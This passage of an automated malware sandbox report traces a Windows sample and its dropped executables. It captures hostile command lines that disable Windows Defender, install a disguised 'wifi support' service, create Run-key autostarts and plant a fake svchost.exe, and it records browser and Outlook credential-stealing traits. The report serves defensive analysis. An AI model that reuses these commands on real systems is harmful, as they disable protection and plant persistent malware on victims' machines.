Source: C:\Users\user\AppData\Roaming\webgfvd Process created: C:\Users\user\AppData\Roaming\webgfvd C:\Users\user\AppData\Roaming\webgfvd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process created: C:\Users\user\AppData\Local\Temp\2531.exe C:\Users\user\AppData\Local\Temp\2531.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process created: C:\Users\user\AppData\Local\Temp\2531.exe C:\Users\user\AppData\Local\Temp\2531.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4DAB.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\MpCmdRun.exe' -RemoveDefinitions -All -Set-Mp Preference -DisableIOAVProtection $True -DisableRealtimeMonitoring $True -Force
Source: C:\Users\user\AppData\Local\Temp\4DAB.exe Process created: C:\Windows\System\svchost.exe 'C:\Windows\System\svchost.exe' formal
Source: C:\Users\user\AppData\Local\Temp\5CDE.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C mkdir C:\Windows\SysWOW64\hqoawywe\
Source: C:\Users\user\AppData\Local\Temp\5CDE.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C move /Y 'C:\Users\user\AppData\Local\Temp\bquyobss.exe' C:\Windows\SysWOW64\hqoawywe\
Source: C:\Users\user\AppData\Local\Temp\5CDE.exe Process created: C:\Windows\SysWOW64\sc.exe 'C:\Windows\System32\sc.exe' create hqoawywe binPath= 'C:\Windows\SysWOW64\hqoawywe\bquyobss.exe /d\'C:\Users\user\AppData\Local\Temp\5CDE.exe\'' type= own start= auto DisplayName= 'wifi support'
Source: C:\Users\user\AppData\Local\Temp\5CDE.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\5CDE.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\5CDE.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Process created: unknown unknown
Source: C:\Windows\System\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\MpCmdRun.exe' -RemoveDefinitions -All -Set-Mp Preference -DisableIOAVProtection $True -DisableRealtimeMonitoring $True -Force
Source: C:\Users\user\AppData\Roaming\webgfvd Process created: unknown unknown
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager
Source: C:\Users\user\AppData\Local\Temp\5CDE.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: bNdOhKPy0F.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: bNdOhKPy0F.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: bNdOhKPy0F.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: bNdOhKPy0F.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: bNdOhKPy0F.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: bNdOhKPy0F.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: bNdOhKPy0F.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.297207048.0000000006FE0000.00000002.00000001.sdmp
Source: Binary string: JC:\fuyapevega.pdb source: bNdOhKPy0F.exe, 00000000.00000000.227175282.0000000000430000.00000002.00020000.sdmp, webgfvd, 00000010.00000002.368726602.0000000000430000.00000002.00020000.sdmp
Source: Binary string: K:\work\for_renat\v2\sloader\x64\Release\sloader.pdb source: 4DAB.exe, 0000001A.00000002.431094760.0000000140000000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: bNdOhKPy0F.exe, 00000001.00000002.300200165.000000006E101000.00000020.00020000.sdmp, webgfvd, 00000018.00000002.383561832.000000006AC51000.00000020.00020000.sdmp
Source: Binary string: wntdll.pdb source: bNdOhKPy0F.exe, webgfvd
Source: Binary string: C:\fuyapevega.pdb source: bNdOhKPy0F.exe, 00000000.00000000.227175282.0000000000430000.00000002.00020000.sdmp, webgfvd, 00000010.00000002.368726602.0000000000430000.00000002.00020000.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.297207048.0000000006FE0000.00000002.00000001.sdmp
Source: bNdOhKPy0F.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: bNdOhKPy0F.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: bNdOhKPy0F.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: bNdOhKPy0F.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: bNdOhKPy0F.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Unpacked PE file: 1.2.bNdOhKPy0F.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\webgfvd Unpacked PE file: 24.2.webgfvd.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\5CDE.exe Unpacked PE file: 28.2.5CDE.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Unpacked PE file: 31.2.6ACA.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\88A3.exe Unpacked PE file: 34.2.88A3.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\4DAB.exe Unpacked PE file: 26.2.4DAB.exe.140000000.3.unpack
Source: C:\Users\user\AppData\Local\Temp\5CDE.exe Unpacked PE file: 28.2.5CDE.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Unpacked PE file: 31.2.6ACA.exe.400000.0.unpack
Source: C:\Windows\System\svchost.exe Unpacked PE file: 32.2.svchost.exe.140000000.3.unpack
Source: C:\Users\user\AppData\Local\Temp\88A3.exe Unpacked PE file: 34.2.88A3.exe.400000.0.unpack
Binary contains a suspicious time stamp
Source: AE30.tmp.1.dr Static PE information: 0xC8733C73 [Sun Jul 26 13:21:55 2076 UTC]
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 0_2_0040C590 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_0040C590
PE file contains an invalid checksum
Source: bquyobss.exe.28.dr Static PE information: real checksum: 0x53ae3 should be:
Source: 2531.exe.4.dr Static PE information: real checksum: 0x0 should be: 0x65f36
Source: svchost.exe.26.dr Static PE information: real checksum: 0x4854ef should be: 0x4856ef
PE file contains sections with non-standard names
Source: AE30.tmp.1.dr Static PE information: section name: RT
Source: AE30.tmp.1.dr Static PE information: section name: .mrdata
Source: AE30.tmp.1.dr Static PE information: section name: .00cfg
Source: AE30.tmp.24.dr Static PE information: section name: RT
Source: AE30.tmp.24.dr Static PE information: section name: .mrdata
Source: AE30.tmp.24.dr Static PE information: section name: .00cfg
Source: sqlite3.dll.31.dr Static PE information: section name: /4
Source: sqlite3.dll.31.dr Static PE information: section name: /19
Source: sqlite3.dll.31.dr Static PE information: section name: /31
Source: sqlite3.dll.31.dr Static PE information: section name: /45
Source: sqlite3.dll.31.dr Static PE information: section name: /57
Source: sqlite3.dll.31.dr Static PE information: section name: /70
Source: sqlite3.dll.31.dr Static PE information: section name: /81
Source: sqlite3.dll.31.dr Static PE information: section name: /92
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E17D0D1 push ecx; ret 1_2_6E17D0E4
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACCD0D1 push ecx; ret 24_2_6ACCD0E4
Source: C:\Users\user\AppData\Local\Temp\2531.exe Code function: 25_2_064D9C82 push ss; iretd 25_2_064D9D17
Source: initial sample Static PE information: section name: .text entropy: 6.94997929013
Source: initial sample Static PE information: section name: .text entropy: 6.85305507137
Source: initial sample Static PE information: section name: .text entropy: 6.85305507137
Source: initial sample Static PE information: section name: .text entropy: 7.02979358609

Persistence and Installation Behavior:

barindex
Drops PE files with benign system names
Source: C:\Users\user\AppData\Local\Temp\4DAB.exe File created: C:\Windows\System\svchost.exe Jump to dropped file
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Users\user\AppData\Local\Temp\4DAB.exe Executable created and started: C:\Windows\System\svchost.exe
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\4DAB.exe File created: C:\Windows\System\svchost.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-private-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\nss3.dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\5CDE.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\lgpllibs.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\webgfvd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\qipcap.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\libEGL.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\mozMapi32.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\MapiProxy_InUse.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\breakpadinjector.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\mozglue.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\AccessibleHandler.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\ldif60.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\3252.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\IA2Marshal.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\nssdbm3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\4DAB.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\prldap60.dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\88A3.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\ldap60.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\webgfvd File created: C:\Users\user\AppData\Local\Temp\AE30.tmp Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\6ACA.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\mozMapi32_InUse.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\2531.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\ucrtbase.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\nssckbi.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-multibyte-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\AccessibleMarshal.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\1D31.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\MapiProxy.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\5CDE.exe File created: C:\Users\user\AppData\Local\Temp\bquyobss.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\softokn3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\user\AppData\Local\Temp\4DAB.exe File created: C:\Windows\System\svchost.exe Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\webgfvd Jump to dropped file

Boot Survival:

barindex
Creates an autostart registry key pointing to binary in C:\Windows
Source: C:\Users\user\AppData\Local\Temp\4DAB.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Windows Host Service
Source: C:\Users\user\AppData\Local\Temp\4DAB.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Windows Host Service
Source: C:\Users\user\AppData\Local\Temp\4DAB.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Windows Host Service
Source: C:\Users\user\AppData\Local\Temp\5CDE.exe Process created: C:\Windows\SysWOW64\sc.exe 'C:\Windows\System32\sc.exe' create hqoawywe binPath= 'C:\Windows\SysWOW64\hqoawywe\bquyobss.exe /d\'C:\Users\user\AppData\Local\Temp\5CDE.exe\'' type= own start= auto DisplayName= 'wifi support'

Hooking and other Techniques for Hiding and Protection:

barindex
DLL reload attack detected
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Module Loaded: Original DLL: C:\USERS\user\APPDATA\LOCAL\TEMP\AE30.TMP reload: C:\WINDOWS\SYSWOW64\NTDLL.DLL
Source: C:\Users\user\AppData\Roaming\webgfvd Module Loaded: Original DLL: C:\USERS\user\APPDATA\LOCAL\TEMP\AE30.TMP reload: C:\WINDOWS\SYSWOW64\NTDLL.DLL
Deletes itself after installation
Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\bndohkpy0f.exe Jump to behavior
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\webgfvd:Zone.Identifier read attributes | delete Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\AppData\Local\Temp\4DAB.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\AppData\Local\Temp\1D31.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1D31.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1D31.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3252.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3252.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3252.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
